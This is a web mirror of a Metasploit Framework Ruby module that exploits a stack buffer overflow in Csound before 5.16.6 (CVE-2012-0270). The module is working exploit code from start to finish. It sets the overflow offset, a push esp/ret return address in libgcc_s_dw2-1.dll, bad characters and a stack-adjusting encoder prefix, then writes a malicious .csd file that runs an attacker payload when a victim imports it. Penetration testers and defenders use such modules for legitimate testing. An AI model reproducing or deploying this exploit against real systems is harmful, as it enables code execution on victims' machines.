Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/csound_getnum_bof.rb
19934 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = NormalRanking

8


9
  include Msf::Exploit::FILEFORMAT

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Csound hetro File Handling Stack Buffer Overflow',

16
        'Description' => %q{

17
          This module exploits a buffer overflow in Csound before 5.16.6.

18
          The overflow occurs when trying to import a malicious hetro file

19
          from tabular format.

20
          In order to achieve exploitation the user should import the malicious

21
          file through csound with a command like "csound -U het_import msf.csd file.het".

22
          This exploit doesn't work if the "het_import" command is used directly

23
          to convert the file.

24
        },

25
        'License' => MSF_LICENSE,

26
        'Author' => [

27
          'Secunia', # Vulnerability discovery

28
          'juan vazquez' # Metasploit module

29
        ],

30
        'References' => [

31
          [ 'CVE', '2012-0270' ],

32
          [ 'OSVDB', '79491' ],

33
          [ 'BID', '52144' ],

34
          [ 'URL', 'http://web.archive.org/web/20120514124556/http://secunia.com/secunia_research/2012-3/' ],

35
          [ 'URL', 'http://csound.git.sourceforge.net/git/gitweb.cgi?p=csound/csound5.git;a=commit;h=7d617a9551fb6c552ba16874b71266fcd90f3a6f']

36
        ],

37
        'Payload' => {

38
          'Space' => 650,

39
          'BadChars' => "\x00\x0a\x1a\x2c\xff",

40
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", # Stack adjustment # add esp, -3500

41
          'DisableNops' => true

42
        },

43
        'Platform' => 'win',

44
        'Targets' => [

45
          [

46
            'Csound 5.15 / Windows XP SP3 / Windows 7 SP1',

47
            {

48
              'Offset' => 132,

49
              'Ret' => 0x6e955446 # push esp #  ret / libgcc_s_dw2-1.dll

50
            }

51
          ],

52
        ],

53
        'Privileged' => false,

54
        'DefaultTarget' => 0,

55
        'DisclosureDate' => '2012-02-23',

56
        'Notes' => {

57
          'Reliability' => UNKNOWN_RELIABILITY,

58
          'Stability' => UNKNOWN_STABILITY,

59
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

60
        }

61
      )

62
    )

63


64
    register_options(

65
      [

66
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.csd']),

67
      ]

68
    )

69
  end

70


71
  def exploit

72
    sploit = rand_text(target['Offset'])

73
    sploit << [target.ret].pack("V")

74
    sploit << payload.encoded

75
    print_status("Creating '#{datastore['FILENAME']}' file ...")

76
    file_create(sploit)

77
  end

78
end

79


80